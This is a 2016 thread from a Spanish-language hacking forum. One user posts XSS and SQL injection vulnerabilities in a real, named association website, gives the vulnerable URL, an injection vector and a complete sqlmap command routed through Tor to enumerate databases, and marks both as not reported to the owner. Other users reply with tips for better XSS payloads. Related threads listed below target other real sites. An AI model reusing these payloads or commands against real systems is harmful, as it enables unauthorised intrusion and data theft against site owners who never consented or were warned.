comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SQLi , XSS] www.fepal.net

  • 3 Respuestas
  • 1205 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« en: Marzo 05, 2016, 09:37:52 pm »
Hola !!!
Bienvenido a mi post

RREEDD
Sitio :http://www.fepal.net

Descripción del sitio:  Federación Española de Asociación de Profesores de Audición y Lenguaje.

Lista de Vulnerabilidades.
  • [XSS] Inyección en URL .
       
        Url del sitio :http://www.fepal.net/noticias.php?id=1
        Vector : <h1>underc0de</h1>
        xploit : You are not allowed to view links. Register or Login<h1>underc0de</h1>&pg=1
        Reportado: NO
        Autor: RREEDD
  • [SQLi] Inyección en URL.
       
        Url del sitio :http://www.fepal.net/noticias.php?id=1
        Inyeccion :  sqlmap.py -u "You are not allowed to view links. Register or Login" -p "id"  --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --time-sec 15
        Herramienta : SQLMAP
        Reportado: NO
        Autor: RREEDD
Saludos desde Chile
« Última modificación: Marzo 06, 2016, 08:28:17 am por EPSILON »

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 365
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #1 en: Marzo 06, 2016, 08:50:58 am »
@You are not allowed to view links. Register or Login no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    1.67%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #2 en: Marzo 06, 2016, 10:35:16 am »
You are not allowed to view links. Register or Login
@You are not allowed to view links. Register or Login no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Además de eso, cuando buscas una XSS tienes que buscar ejecutar código javascript, en muchas ocasiones te permite poner una etiqueta html, pero no se puede llegar a ejecutar un código javascript.

Éste Payload estaría mejor: "You are not allowed to view links. Register or Login"

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« Respuesta #3 en: Marzo 06, 2016, 12:05:45 pm »
RREEDDHola!!
You are not allowed to view links. Register or Login
@You are not allowed to view links. Register or Login no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Gracias por la aclaración, porque mi intención al poner el payload de sqlmap era demostrar que era vulnerable, así que lo tendre en mente para la próxima.

Muchas gracias a todos por comentar.

Saludos desde Chile.

 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 759
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 1848
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1045
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1008
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1151
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos